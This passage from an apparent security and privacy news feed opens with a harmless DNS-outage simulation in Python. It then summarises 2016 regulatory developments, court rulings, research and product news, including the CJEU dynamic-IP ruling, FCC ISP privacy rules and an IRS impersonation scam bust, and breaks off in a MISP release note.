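# below are hypothetical, chosen only to show the mechanism.
RECORDS = {
    "example-news.com": "93.184.216.34",
    "example-video.com": "198.51.100.7",
}

def resolve(hostname, records=RECORDS):
    """Return the IP address for a hostname, or None if resolution fails."""
    return records.get(hostname)

def fetch(hostname):
    ip = resolve(hostname)
    if ip is None:
        # This is what users saw during the outage: the origin servers
        # were up, but clients could not find them without DNS.
        return f"{hostname}: unreachable (DNS resolution failed)"
    return f"{hostname}: connecting to {ip}"

print(fetch("example-news.com"))

# Simulate the resolver being knocked offline by a DDoS attack:
RECORDS.clear()
print(fetch("example-news.com"))
```

The sketch shows why attacking a single DNS provider disrupted so many unrelated services at once: they all depended on the same resolution layer.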

European Commission Proposes Changes to Data Export Decisions

Earlier this month, at a meeting of the Article 31 Committee, the European Commission (“Commission”) unveiled two draft Commission Implementing Decisions that propose amendments to the existing adequacy decisions and decisions on EU Model Clauses.

Adequacy decisions establish whether a third country provides adequate safeguards to protect personal data, and decisions are made by the Commission following its assessment of a country’s national law and international commitments on data protection. Countries deemed to be adequate are added to the Commission’s ‘white list’ and transfers can be made from the EEA to that country without requiring further safeguards.

The Commission’s move to amend the decisions follows the ruling of the Court of Justice of the European Union (“CJEU”) in the Schrems case. In its ruling, the CJEU held that the EU-U.S. Safe Harbor data transfer framework was invalid. The Commission’s proposed amendments remove provisions restricting DPAs’ power in the existing adequacy decisions and under EU Model Clauses.

A number of the EU Member States that presented at the Article 31 Committee meeting were in favor of the two amendments, although others requested more time to consider the proposed changes before making a decision. As a result, it was agreed that another meeting would be scheduled. In the meantime, the Article 29 Working Party will be asked to present its views on the amendments. The draft texts have yet to be made public.

U.S. and Japan Commit to Improve and Advance Cross-Border Privacy

On October 19, 2016, the International Trade Administration issued a press release reaffirming the commitment of both the U.S. Department of Commerce and Japan’s Personal Information Protection Commission (the “PPC”) to continue implementation of the APEC Cross-Border Privacy Rules (“CBPR”) system in order to foster the protection of personal information transferred across borders. According to the press release, the PPC’s “recent decision to recognize the system as a mechanism for international data transfers in the implementing guidelines for Japan’s amended privacy law marks an important milestone for the development of the APEC CBPR system in Japan.” Going forward, both agencies also have committed to cooperate in raising awareness and encouraging other APEC member economies to implement the CBPR system.

Developed by the 21 APEC member economies, the APEC CBPR system is a regional, multilateral, cross-border data transfer mechanism and enforceable privacy code of conduct developed for businesses. The CBPRs implement the nine high-level APEC Privacy Principles set forth in the APEC Privacy Framework. Currently, the U.S., Mexico, Canada and Japan are participants in the APEC CBPR framework.

Startup Security Weekly #13 – Gimme Some Moore

HD Moore, founder of the Metasploit project, joins us for an interview. In startup news, we talk about the differences between angel and VC investments, expanding the concept of entrepreneurship, whether running a startup is for you, how to become a cybersecurity entrepreneur in a crowded market, and making your elevator pitch more memorable. Stay tuned!

NHTSA Set to Release New Automobile Cybersecurity Best Practices

On October 14, 2016, the National Highway Traffic Safety Administration (“NHTSA”) indicated in a letter to Congress that it intends to issue new best practices on vehicle cybersecurity. This letter came in response to an earlier request from the House Committee on Energy and Commerce (“Energy and Commerce Committee”) that NHTSA convene an industry-wide effort to develop a plan to address vulnerabilities posed to vehicles by On-Board Diagnostics (“OBD-II”) ports. Since 1994, the Environmental Protection Agency has required that OBD-II ports be installed in all vehicles so that they can be tested for compliance with the Clean Air Act. OBD-II ports provide valuable vehicle diagnostic information and allow for aftermarket devices providing services such as “good driver” insurance benefits and vehicle tracking. Because they provide direct access to a vehicle’s internal network, however, OBD-II ports are widely cited as the central vulnerability in vehicle cybersecurity.

Although the Energy and Commerce Committee requested a plan regarding OBD-II ports specifically, the NHTSA letter reiterates previous NHTSA statements that vehicle cybersecurity should be addressed more comprehensively than “each entry port at a time.” The letter says that NHTSA’s forthcoming guidance will be based on the National Institute of Standards and Technology (“NIST”) Cybersecurity Framework’s five principles: identify, protect, detect, respond and recover.

Coming not long after NHTSA released guidance on autonomous vehicles that called for increased information sharing within the automotive sector, NHTSA’s reliance on the NIST Cybersecurity Framework in its vehicle cybersecurity guidance indicates that the agency increasingly seeks to apply to passenger vehicles the cybersecurity measures currently utilized within critical infrastructure. Indeed, the NIST Cybersecurity Framework was developed pursuant to President Obama’s E.O. 13636, Improving Critical Infrastructure Cybersecurity.

Social Engineering Methods for Penetration Testing

Social engineering is the practice of learning and obtaining valuable information by exploiting human vulnerabilities. It is an art of deception that is considered to be vital for a penetration tester when there is a lack of information about the target that can be exploited.

Article 29 Working Party Issues Results of Fablab Workshop on the GDPR

On October 7, 2016, the Article 29 Working Party (the “Working Party”) published a summary of the discussions that took place at its “Fablab” workshop entitled GDPR/from concepts to operational toolbox, DIY, which took place on July 26, 2016, in Brussels.

The Fablab workshop gathered more than 90 participants, including 40 representatives from data protection authorities, to discuss certain operational and practical issues linked to the EU General Data Protection Regulation (“GDPR”) with representatives of industry, civil society, academics and relevant associations. The objective of the workshop was for the Working Party to develop, by the end of this year, best practices and guidelines for the implementation of the GDPR, in particular with respect to the following topics:

  • Data Protection Officer (“DPO”). The participants discussed the need for a flexible interpretation of the criteria that will trigger the obligation for a data controller to appoint a DPO, the requirements regarding the designation of the DPO, conflicts of interests and the main duties of the data controller or data processor regarding the DPO. Amongst other topics, the participants of the Fablab discussed the following points:
    • the location of the DPO (i.e., whether the DPO can be located outside of the EU);
    • the nature of the DPO’s liability (i.e., civil or criminal liability); and
    • whether a company that has voluntarily appointed a DPO should be subject to the provisions of the GDPR applicable to DPOs.
  • Data Portability. The participants discussed several general concerns with respect to this newly introduced right; in particular:
    • the scope of the data portability right (i.e., which types of personal data are covered by such right);
    • the degree of investment that is expected from data controllers to comply with such right;
    • the types of data that individuals would be most interested in; and
    • how to ensure interoperability between systems to allow data controllers to share personal data between them.
  • Data Protection Impact Assessment (“DPIA”) Risks. The participants discussed the risks and benefits of DPIAs, and called for greater clarity on the circumstances in which a DPIA is required.
  • Certification. The discussion focused on the four essential elements of the certification mechanisms under the GDPR; in particular:
    • The most relevant models to develop privacy certification mechanisms in the EU. The participants agreed that, ideally, there should be a uniform and well-known European certification scheme guaranteeing the level of uniformity and high standards.
    • The accreditation procedure and the roles and obligations of accreditation and certification bodies, as well as data protection authorities.
    • The main elements of a certification scheme, including a common and transparent level of evaluation and a clear focus on privacy instead of IT security.
    • An effective and meaningful certification procedure. The participants discussed potential threats and recommended procedures for mitigation of these threats with respect to the certification mechanism (e.g., consequences of a failure to certify).

The Working Party will organize another FabLab workshop in 2017 to discuss other operational and practical issues relating to the implementation of the GDPR.

HHS Releases Guidance on HIPAA and Cloud Computing

Earlier this month, the Department of Health and Human Services’ Office for Civil Rights issued guidance (the “Guidance”) for HIPAA-covered entities that use cloud computing services involving electronic protected health information (“ePHI”).

The Guidance makes clear that covered entities and business associates may use a cloud service to store or process ePHI, provided that the covered entity or business associate enters into a HIPAA-compliant business associate contract or agreement (“BAA”) with the cloud services provider (“CSP”). The BAA must establish the permitted and required uses and disclosures of ePHI, and require the BAA to appropriately safeguard ePHI, including by implementing the requirements of the HIPAA Security Rule. The BAA also must require the CSP to report to the covered entity or business associate whose ePHI it maintains any security incidents of which it becomes aware. The parties, however, are free to define the level of detail, frequency or format of security incident reports.

The Guidance also clarifies that CSPs do not fall within the conduit exception to the HIPAA Rules, because the conduit exception is limited to entities that transmit, and in the process only have transient access to, PHI. Unlike mere conduits, CSPs maintain ePHI for storage purposes and have “more persistent access to the ePHI.” Additionally, the Guidance permits health care providers to use mobile devices to access cloud-stored ePHI, provided that appropriate physical, administrative and technical safeguards, as well as appropriate BAAs, are in place to protect the ePHI’s confidentiality, integrity and availability. The Guidance also permits covered entities and business associates to use CSPs that store ePHI on servers outside of the U.S., but highlights that entities using CSPs to maintain ePHI outside the U.S. should consider the risks associated with the country where the cloud server is located.

Finally, the Guidance notes that, pursuant to the HIPAA Security Rule, CSPs are directly liable for failing to safeguard ePHI as well as for impermissible use or disclosure of ePHI. Although the HIPAA Rules do not require CSPs to provide documentation or allow auditing of their security practices, a BAA or other contractual agreement may impose such obligations.

Federal Regulators Propose New Cybersecurity Rule for Big Banks

On October 19, 2016, the Federal Deposit Insurance Corporation (“FDIC”), the Federal Reserve System (the “Fed”) and Office of the Comptroller of the Currency issued an advance notice of proposed rulemaking suggesting new cybersecurity regulations for banks with assets totaling more than $50 billion (the “Proposed Standards”).

The Proposed Standards address five categories of cybersecurity: cyber risk governance; cyber risk management; internal dependency management; external dependency management; and incident response, cyber resilience and situational awareness. The Proposed Standards would require covered entities to develop written, board-approved cybersecurity strategies to hold senior management accountable and incorporate procedures for independent risk management reporting to the company’s chief risk officer. Covered entities would also be required to define internal and external cyber risks and develop resiliency plans to ensure continued operation of critical business functions during a cyber incident.

The Proposed Standards include a two-tiered system that establishes more stringent requirements for systems of those covered entities that are deemed “critical to the financial sector.” Under these more stringent requirements, covered entities would be obligated to implement the “most effective, commercially available controls” on sector-critical systems and establish a test-validated two-hour time period for such systems to “recover from a disruptive, corruptive, or destructive cyber event.”

The Proposed Standards would apply to companies with total consolidated assets of at least $50 billion, as well as to Fed-supervised non-bank financial companies, financial market infrastructures and financial market utilities (as designated by the Financial Stability Oversight Council) and third parties who provide services to these firms. Community banks would not be subject to the Proposed Standards. FDIC Chairman Martin J. Gruenberg released a statement praising the issuance of the Proposed Standards, stating, “The enhanced standards for large and interconnected entities would be aimed at increasing their operational resilience and reducing the impact on the financial system of a cyber event experienced by one of these entities.”

Comments on the Proposed Standards are due January 17, 2017.

CJEU Rules That Dynamic IP Addresses Are Personal Data

On October 19, 2016, the Court of Justice of the European Union (the “CJEU”) issued its judgment in Patrick Breyer v. Bundesrepublik Deutschland, following the Opinion of Advocate General Manuel Campos Sánchez-Bordona on May 12, 2016. The CJEU followed the Opinion of the Advocate General and declared that a dynamic IP address registered by a website operator must be treated as personal data by that operator to the extent that the user’s Internet service provider (“ISP”) has, and may provide, additional data that, in combination with the IP address, would allow for the identification of the user.

The case arose in 2008 when a German citizen brought an action before the German courts seeking an injunction to prevent websites, operated by the Federal German Institutions, from registering and storing his IP addresses. Most of these websites store information on all access operations in logfiles (including the IP address of the computer from which access was sought, and the date and time when a website was accessed) for the purposes of preventing cyber attacks and making it possible to prosecute ‘pirates.’ The German citizen’s claim was initially rejected by the court of first instance. The claim was granted in part, however, by the court of appeals. Subsequently, both parties appealed the decision to the German Federal Court of Justice.
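The logfiles at issue pair each visitor's IP address with an access timestamp, which is exactly the combination the CJEU treated as potentially identifying. A minimal sketch of such a log and its parsing (the log format, addresses, and timestamps below are hypothetical, invented for illustration):

```python
import re
from datetime import datetime

# Hypothetical access-log lines in the form: <ip> - [<timestamp>] "<request>"
LOG_LINES = [
    '203.0.113.45 - [19/Oct/2016:10:12:01] "GET /index.html"',
    '198.51.100.23 - [19/Oct/2016:10:12:05] "GET /press.html"',
]

LOG_PATTERN = re.compile(r'^(?P<ip>[\d.]+) - \[(?P<ts>[^\]]+)\]')

def parse_access_log(lines):
    """Extract the (IP address, timestamp) pairs a website operator stores."""
    entries = []
    for line in lines:
        match = LOG_PATTERN.match(line)
        if match:
            ts = datetime.strptime(match.group("ts"), "%d/%b/%Y:%H:%M:%S")
            entries.append((match.group("ip"), ts))
    return entries

for ip, ts in parse_access_log(LOG_LINES):
    print(ip, ts.isoformat())
```

On its own, each stored pair points only at an address that may be reassigned to a different subscriber tomorrow; it becomes identifying once combined with the ISP's subscriber records, which is the crux of the ruling.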

The German Federal Court of Justice suspended the proceedings and referred the following two questions to the CJEU:

  • Whether a dynamic IP address (i.e., an IP address which is different each time there is a new connection to the Internet) registered by an online media services provider (here, the German institutions) is personal data within the meaning of Article 2(a) of the EU Data Protection Directive, when only a third party (the ISP) has the additional information necessary to identify the website user.
  • Whether the ‘legitimate interest’ legal basis under Article 7(f) of the EU Data Protection Directive is contrary to a provision of the German Telemedia Act, which is interpreted by most German legal commentators as preventing the storage of personal data after the consultation of online media in order to guarantee the security and continued proper functioning of those media. According to that interpretation, personal data must be deleted at the end of the consultation period, unless the data is required for billing purposes.

The CJEU gave a positive reply to both questions. With regard to the first question, the CJEU noted that there appear to be legal channels in Germany enabling the online media services provider to contact the competent authority – in particular, in the event of cyber attacks – so that the competent authority may take the steps necessary to obtain from the ISP additional information on the website user and subsequently bring criminal proceedings. In other words, the online media services provider would have the means, which may reasonably be used, to identify the website user – with the assistance of third parties – on the basis of the IP addresses stored. Consequently, the CJEU ruled that the dynamic IP address of a website user is personal data, with respect to the website operator, if that operator has the legal means allowing it to identify the user concerned with additional information about that user which is held by the ISP.

With regard to the second question, the CJEU ruled that the German legislation, as interpreted by most legal commentators, excludes the possibility of performing the ‘legitimate interest’ test (i.e., in the present case, balancing the objective of ensuring the general operability of the online media against the interests or fundamental rights of website users). In this respect, the CJEU emphasized that German federal institutions, which provide online media services, may have a legitimate interest in ensuring the continued functioning of their websites and thus in storing certain user personal data in order to protect themselves against cyber attacks.

The German Federal Court of Justice is now required to decide on the dispute itself.

View the full text of the judgment of the CJEU. For a summary, please see the press release of the CJEU.

California AG Announces Launch of Online CalOPPA Reporting Form

On October 14, 2016, California Attorney General Kamala D. Harris announced the release of a publicly available online form that will enable consumers to report potential violations of the California Online Privacy Protection Act (“CalOPPA”). CalOPPA requires website and mobile app operators to post a privacy policy that contains certain specific content.

The form asks consumers to state the name of the company being reported and indicate whether the privacy policy (1) is missing or inapplicable, (2) is difficult to locate, (3) is incomplete, (4) has been violated, or (5) has failed to provide notice of a material change. The form enables consumers to provide additional explanation for the alleged violation of CalOPPA as well as any supporting documentation, such as screenshots of the company’s website or app, or correspondence with the company. The form also requests the consumer’s contact information but notes that providing such information is entirely optional.

In addition to the online form, the California Attorney General’s Office announced that it will partner with the Usable Privacy Policy Project at Carnegie Mellon University to develop a tool that will examine differences in a mobile app’s privacy policy and its actual data collection and sharing practices.

In the press release announcing the online form, Attorney General Harris stated, “In the information age, companies doing business in California must take every step possible to be transparent with consumers and protect their privacy.” She further noted that it is critical to “implement robust safeguards on what information is shared online and how.”

CIPL and Telefónica Call for Action on New Approaches to Data Transparency

Recently, the Centre for Information Policy Leadership (“CIPL”) at Hunton & Williams LLP, a privacy and information policy think tank based in Brussels, London and Washington, D.C., and Telefónica, one of the largest telecommunications companies in the world, issued a joint white paper on Reframing Data Transparency (the “white paper”). The white paper was the outcome of a June 2016 roundtable held by the two organizations in London, in which senior business leaders, Data Privacy Officers, lawyers and academics discussed the importance of user-centric transparency to the data-driven economy.

The roundtable and white paper build upon a number of current initiatives, including the work of the Data Transparency Lab; the 2015 EU-U.S. Privacy Bridges Project, which, among other topics, explored the issue of data transparency; as well as the new European General Data Protection Regulation, which includes enhanced transparency obligations for organizations. As reflected in the white paper, the participants at the roundtable agreed that a new, user-centric conception of transparency represents a multidimensional, multidisciplinary and multistakeholder challenge that is essential to effectively protect individuals and enable digital trust, innovation and beneficial uses of personal data.

The issues explored during the roundtable and in the white paper include the following:

  • The transparency deficit in the digital age. There is a growing gap between traditional, legal privacy notices and user-centric transparency that is capable of delivering understandable and actionable information concerning an organization’s data use policies and practices, including why it processes data, what the benefits are to individuals and society, how it protects the data and how users can manage and control the use of their data.
  • The impact of the transparency deficit. The transparency deficit undermines customer trust and customers’ ability to participate more effectively in the digital economy.
  • Challenges of delivering user-centric transparency. In a connected world where there may be no direct relationship between companies and their end users, both transparency and consent as a basis for processing are particularly challenging.
  • Transparency as a multistakeholder challenge. Transparency is not solely a legal issue, but a multistakeholder challenge, which requires engagement of regulators, companies, individuals, behavioral economists, social scientists, psychologists and user experience specialists.
  • The role of data protection authorities (“DPAs”). DPAs play a key role in promoting and incentivizing effective data transparency approaches and tools.
  • The role of companies. Data transparency is a critical business issue because transparency drives digital trust as well as business opportunities. Organizations must innovate on how to deliver user-centric transparency. Data driven companies must research and develop new approaches to transparency that explain the value exchange between customers and companies and the companies’ data practices, and create tools that enable their customers to exercise effective engagement and control.
  • The importance of empowering individuals. It is crucial to support and enhance individuals’ digital literacy, which includes an understanding of the uses of personal data and the benefits of data processing, as well as knowledge of relevant privacy rights and the data management tools that are available to them. Government bodies, regulators and industry should be involved in educating the public regarding digital literacy. Such education should take place in schools and universities, and through consumer education campaigns. Transparency is the foundation and sine qua non of individual empowerment.
  • The role of behavioral economists, social scientists, psychologists and user experience specialists. Experts from these disciplines will be crucial in developing user-centric transparency and controls.

UK ICO Seeks Personal Liability for Directors

On October 13, 2016, at a House of Commons Public Bill Committee meeting discussing the latest draft of the Digital Economy Bill (the “Bill”), Elizabeth Denham, the UK Information Commissioner, suggested that directors of companies that violate data protection laws should be personally liable to pay fines. The Bill is designed to enable businesses and individuals to access fast, digital communications services, promote investment in digital communications infrastructure and support the “digital transformation of government.” Measures to improve the digital landscape contained in the Bill include the introduction of a new Electronic Communications Code and more effective controls to protect citizens from nuisance calls. More controversially, however, the Bill also contains provisions both enabling and controlling the sharing of data between public authorities and private companies.

Responding to a question about so-called “nuisance calls,” Denham agreed with a Member of Parliament’s suggestion that the directors of companies found to have seriously breached data protection laws should be personally liable for the fines imposed on their companies. It was suggested that this enforcement would allow the Information Commissioner’s Office (the “ICO”) to recoup a much larger proportion of the £4 million it has issued in fines in the last year than it is able to collect at present. Denham suggested that this is, in part, due to a large number of companies that receive fines from the ICO subsequently falling into liquidation.

Currently, the ICO can impose fines of up to £500,000, with the largest fine to date being a £400,000 fine imposed on TalkTalk on October 5, 2016. Further detail on how liability could be imposed on directors was not discussed at the meeting.

In addition, Denham made the following recommendations:

  • to place the ICO’s Direct Marketing Code on a statutory footing;
  • to lower the threshold for harm to an individual at which point a data security breach is considered to have occurred; and
  • to improve transparency when personal data is collected and in respect of safeguards that are in place (e.g., publishing privacy impact assessments).

It was claimed that these measures would provide better protection for the general public. Although Denham welcomed the development of the Digital Economy Bill, she stated that improvements are required before it comes into force.

Improved Efficiency and Centralised Management with new Systems Management


In today’s digital world, internet-connected devices have become part of every aspect of our lives, and as this digital transformation continues, it is imperative that businesses understand the complexities that come with it.

To address this situation, Panda Security presents the latest version of Systems Management – the most powerful, scalable and easy-to-use Remote Monitoring and Management (RMM) tool on the market.

The Challenge

Digital transformation brings with it a number of new challenges that business leaders must consider. Adding to an already complex IT environment, the challenges businesses face include the ever-increasing number of devices connected to the organisation’s network, the growing number of remote users, and the need to fix problems with greater flexibility.

The growing number of devices used every day in the workplace brings with it the threat of new incidents that disrupt work. Consequently, as these inefficiencies multiply, they add to the IT department’s workload, and affect business management, often resulting in security being overlooked.

The Solution – Greater Automation and Maximum Performance

Systems Management remotely monitors and manages devices from the Cloud so that every IT department can offer a professional service that minimises impact on daily work.

What’s New

The new version of Systems Management gives you maximum performance out-of-the-box. To increase efficiency and grow business for our clients and partners, Systems Management is built on five pillars:

  • Asset Inventory
  • Device Monitoring
  • Remote Device Management
  • Resolution Tool Support
  • Generated Reports

This version comes with significant new and updated features in response to customer feedback. Highlights include:

  • Recommended monitoring policies based on the best practices of clients.
  • New filters to improve management systems – instant visualisation of the network so you can see what you need.
  • New reports for server performance, CPU, memory, and disc performance for the last 30 days, including general averages.
  • Integration with Microsoft Hyper-V, and new hardware monitors added for VMware ESXi.
  • New maintenance windows: alerts can now be scheduled and silenced.

This new update makes Systems Management a powerful, highly scalable, easy-to-use administration tool that will save users time and money.


G-7 Endorses Best Practices for Bank Cybersecurity

On October 11, 2016, Group of Seven (“G-7”) financial leaders endorsed the Fundamental Elements of Cybersecurity for the Financial Sector (“Best Practices”), a set of non-binding best practices for banks and financial institutions to address cybersecurity threats. The endorsement was motivated by recent large hacks on international banks, including the February 2016 theft of $81 million from the central bank of Bangladesh’s account at the New York Federal Reserve.

The Best Practices are divided into eight elements designed to help financial institutions tailor their cybersecurity practices to their specific operations, the relevant threat landscape, their role in the financial sector and legal and regulatory requirements. The elements include:

  • establishing and maintaining a cybersecurity strategy and framework tailored to specific risks and relevant, applicable laws;
  • defining and facilitating roles and responsibilities of governance personnel (e.g., boards of directors);
  • assessing risks and controls to protect against those risks;
  • establishing systematic monitoring processes to rapidly detect cyber threats and evaluate the effectiveness of existing controls;
  • maintaining response procedures to timely identify, assess and contain a cyber incident and make required notifications;
  • resuming normal operations responsibly with an eye toward continued remediation;
  • sharing reliable cybersecurity information with internal and external stakeholders; and
  • reviewing institutional cybersecurity policies and procedures regularly to address changes in cyber risks and resource allocations, and to amend procedures as necessary based on lessons learned.

The Best Practices emphasize the need for flexibility in the face of ever-evolving cyber threats, and stress that financial institutions should continuously re-assess their cybersecurity strategies and practices to effectively combat such threats.

Federal Reserve Vice Chairman Stanley Fischer praised the G-7’s endorsement of the Best Practices, stating that, “The international financial architecture is only as strong as its weakest link and that is why the United States should work with our partners around the world to bolster their information security and resiliency…These elements are a crucial step in further hardening each link in the chain of our global financial system.”

Relevant to my rants

Before I resume my rambling on conferences and presentations, here’s a great article I came across via Tales of the Cocktail, a site you would expect me to link to from my, ahem, travel blog.

This article is specifically about submitting a cocktail seminar to Tales of the Cocktail, but several points in the list of seventeen items apply to a wide variety of events, regardless of topic or venue.

Also, it has been said many times by many people and in many ways- one of the best tips for getting your proposal accepted at any event is to follow the rules. Really, read the rules/guidelines for submission, and follow them.  Also, submit early.  Most event reviewers are volunteers and do it in their spare time, something which gets scarce when the deadline approaches.  Submit early and you’re more likely to get non-bloodshot eyes looking at your paper.



NIST Survey Suggests Online Users Suffer from Security Fatigue

A recent study from the National Institute of Standards and Technology (“NIST”) warns that an overabundance of computer security measures might actually lead users to engage in “risky computing behavior at work and in their personal lives.”

Researchers conducted qualitative interviews with respondents ranging in age from 20 to mid-60s and of various geographic and employment backgrounds, regarding their perception of and beliefs about cybersecurity and online privacy. Researchers found that many respondents were suffering from “security fatigue,” defined as “a weariness or reluctance to deal with computer security.” The feeling of being asked to make more computer security decisions than they were able to manage (e.g., remembering a different password for every website requiring user login) resulted in respondents engaging in higher-risk online behavior, including using the same password for multiple websites and choosing the easiest security option among alternatives. Researchers also found that, in some cases, security fatigue could cause a user to abandon online activity altogether, such as failing to complete an online purchase because he or she felt frustrated with the security measures for creating or accessing an online account.

The study also uncovered a sense of hopelessness among respondents with respect to how they could effectively protect their data given the perceived frequency with which large organizations suffer cyber attacks. Many respondents believed that responsibility for computer security and protecting user data should fall to the entity with which they interact online (e.g., a bank or online retailer).

In a press release, the NIST noted that security fatigue can expose Internet users and the networks they access to security risks and can result in lost customers for businesses. The researchers suggest three ways to alleviate security fatigue and ensure that users follow secure online practices, both in their professional and personal lives:

  • limit the number of security decisions that users must make;
  • simplify users’ ability to choose the right security action; and
  • design for consistent decision making whenever possible.

Researchers intend to conduct additional interviews to further clarify computer security attitudes and behaviors.

Catching IRS fraudsters proves the scale and profitability of impersonation cons

Fraudsters who posed as IRS officials threatened hardworking Americans with imprisonment for the crime of tax default. Their modus operandi was simple: question victims about defaulting on their tax payments; threaten legal action, arrest, deportation or suspension of business rights; and finally offer an easy way out – a chance to close the case without prosecution in exchange for a one-time deposit into a bank account, or alternatively obtain the victim’s bank account details, which were then wiped clean.

Incredible as it may seem, the con was so successful that the kingpin lived a life of five-star luxury, with fancy cars and hotel stays. In the short span of two years he amassed significant wealth and employed over 700 people in several call centers across India and the US. Most of these call centers were owned by trusted associates and employed high school graduates or dropouts who were lured with high pay and luxurious lifestyles.

Income earned in dollars was converted into Indian rupees through illegal money-laundering channels known as hawala. All employees were paid in cash. Call center executives were offered incentives based on the income they generated from these frauds, and top performers were even offered a chance to work directly with the kingpin in his home city of Ahmedabad, Gujarat, while being put up in 3- and 4-star hotels.

Fortunately, India takes these crimes seriously. Once the scheme was reported, Mumbai police detectives went incognito and surveyed these call centers over a period of 15 days before busting them and arresting over 50 people. Those arrested will be tried under the Indian IT Act and penal code.

There are, however, several countries that do not act on these crimes because the victims are not their citizens.

Cybercitizens are advised to be wary of calls that ask for personal information or money in any form.

FCC to Vote on Proposed Privacy Rules for Internet Service Providers

On October 27, 2016, the Federal Communications Commission (“FCC”) will vote on whether to finalize proposed rules (the “Proposed Rules”) concerning new privacy restrictions for Internet Service Providers (“ISPs”). The Proposed Rules, which revise previous versions introduced earlier this year, would require customers’ explicit (or “opt-in”) consent before an ISP can use or share a customer’s personal data, including web browsing and app usage history, geolocation data, children’s information, health information, financial information, email and other message contents and Social Security numbers.

In addition to the opt-in requirement, the Proposed Rules address whether ISPs may charge more for their services, or refuse service altogether, if a customer does not consent to the use and sharing of his or her personal information. The Proposed Rules allow an ISP to offer a discount or incentive to a customer who consents, but forbid the ISP from refusing to provide service to a customer who withholds consent. Under the Proposed Rules, the FCC will evaluate discounts and incentives exchanged for customer’s personal data on a case-by-case basis. Additionally, the Proposed Rules require ISPs to inform customers of how their data will be collected, for what purposes it might be used and the entities with whom it is shared. In the event of a breach, the ISP would be required to notify the FCC within seven business days of the breach and customers within 30 days. Breaches affecting more than 5,000 customers would also require notification to the FBI and U.S. Secret Service within seven business days.
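The notification timeline above (FCC within seven business days, customers within 30 calendar days, and the FBI and U.S. Secret Service when more than 5,000 customers are affected) can be sketched as a simple deadline calculator. This is an illustrative sketch only; the function names are mine, and "business days" is simplified to weekdays with no holiday calendar:

```python
from datetime import date, timedelta

def add_business_days(start: date, days: int) -> date:
    """Advance `days` business days (Mon-Fri), skipping weekends.
    A real implementation would also consult a federal holiday calendar."""
    current = start
    while days > 0:
        current += timedelta(days=1)
        if current.weekday() < 5:  # 0-4 are Monday through Friday
            days -= 1
    return current

def breach_deadlines(discovered: date, affected_customers: int) -> dict:
    """Return who must be notified, and by when, per the Proposed Rules."""
    deadlines = {
        "FCC": add_business_days(discovered, 7),          # 7 business days
        "customers": discovered + timedelta(days=30),     # 30 calendar days
    }
    if affected_customers > 5000:
        # Large breaches also trigger federal law enforcement notification.
        deadlines["FBI and Secret Service"] = add_business_days(discovered, 7)
    return deadlines
```

For example, a breach of 6,000 customers discovered on Thursday, October 27, 2016, would require FCC (and FBI/Secret Service) notification by Monday, November 7, and customer notification by November 26.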

In a blog post about the Proposed Rules, FCC Chairman Tom Wheeler noted that they would not apply to websites or apps subject to FTC jurisdiction, even if those websites or apps are owned by an ISP that is subject to the Proposed Rules. Chairman Wheeler wrote, “It’s also important to note that the proposed rules would not prohibit ISPs from using or sharing their customers’ information – they would simply require ISPs to put their customers in the driver’s seat when it comes to those decisions.”

Texas AG Settles Suit with Messaging App Over Children’s Data Practices

On October 3, 2016, the Texas Attorney General announced a $30,000 settlement with mobile app developer Juxta Labs, Inc. (“Juxta”) stemming from allegations that the company violated Texas consumer protection law by engaging in false, deceptive or misleading acts or practices regarding the collection of personal information from children.

The Texas Attorney General alleged that Juxta, the developer of the “Jott” messaging app and other apps for gaming and social media, misled consumers regarding the company’s privacy practices and compliance with privacy laws. According to the Texas Attorney General, Juxta’s apps were previously easy for children of any age to access. Many of the company’s apps offered free children’s games, generating revenue from advertisements and in-app purchases. Personal information was transmitted over these apps, including IP addresses and GPS coordinates, which could be used to pinpoint a child’s location.

Under the terms of the Assurance of Voluntary Compliance (“AVC”), approved by the Travis County District Court, Juxta agreed not to misrepresent its privacy practices regarding the personal information it collects from children under the age of 13, and not to engage in such collection through its apps unless the apps are in compliance with the Children’s Online Privacy Protection Act (“COPPA”). The AVC adopts COPPA’s definition of “Personal Information,” which includes data such as online contact information (such as an instant message user identifier); a photograph, video or audio file that contains a child’s image or voice; geolocation information sufficient to identify street name and name of a city or town; and persistent identifiers that can be used to recognize a user over time and across different websites or online services (e.g., IP addresses or a customer number held in a cookie). Juxta must also develop and maintain an up-to-date and accurate privacy policy that is clear, conspicuous and understandable. This privacy policy must be made prominently available on each of its apps and websites, including a hyperlink to the policy in any areas of its apps or websites that collect personal information from children younger than 13.

Additionally, Juxta is required to develop, implement and maintain procedures to ensure its Jott app does not contain any networks that are likely to predominantly include children under the age of 13. In particular, Juxta must refrain from designating any of its networks as an “Elementary School” network within the State of Texas. In the event Juxta seeks to prevent children under the age of 13 from using its apps or providing personal information, Juxta must implement and maintain reasonable neutral age screening mechanisms that discourage children from falsifying their age. Juxta further agreed to delete within 30 days (1) all personal information of children under 13 in its custody or control, and (2) all personal information in its custody or control regarding members of its “Elementary School” networks.
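A “neutral” age screen of the kind the AVC requires typically asks for a full birth date without revealing that 13 is the threshold, so a child has no hint of what answer to fake. A minimal sketch of the idea (the function names and cutoff handling are mine, not from the AVC):

```python
from datetime import date

def age_on(birth_date: date, today: date) -> int:
    """Compute age in whole years as of `today`."""
    years = today.year - birth_date.year
    # Subtract one if this year's birthday hasn't occurred yet.
    if (today.month, today.day) < (birth_date.month, birth_date.day):
        years -= 1
    return years

def passes_age_screen(birth_date: date, today: date, cutoff: int = 13) -> bool:
    """Neutral age gate: the UI collects only a birth date and never
    displays `cutoff`, which discourages children from simply typing in
    a qualifying age. COPPA guidance also suggests not letting users
    retry immediately after failing the screen."""
    return age_on(birth_date, today) >= cutoff
```

The key design point is neutrality: asking "Are you over 13?" invites falsification, while a bare date-of-birth field does not signal the rule being enforced.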

Toolsmith Release Advisory: Malware Information Sharing Platform (MISP) 2.4.52

7 OCT 2016 saw the release of MISP 2.4.52.
MISP, Malware Information Sharing Platform and Threat Sharing, is free and open source software to aid in sharing of threat and cyber security indicators.
An overview of MISP as derived from the project home page:
  • Automation: store IOCs in a structured manner, and benefit from correlation and automated exports for IDS or SIEM, in STIX or OpenIOC format, and even to other MISPs.
  • Simplicity: the driving force behind the project. Storing and using information about threats and malware should not be difficult. MISP allows getting the maximum out of your data without unmanageable complexity.
  • Sharing: the key to fast and effective detection of attacks. Often organizations are targeted by the same Threat Actor, in the same or different Campaign. MISP makes it easier to share with and receive from trusted partners and trust-groups. Sharing also enables collaborative analysis, preventing redundant work.
The MISP 2.4.52 release includes the following new features:
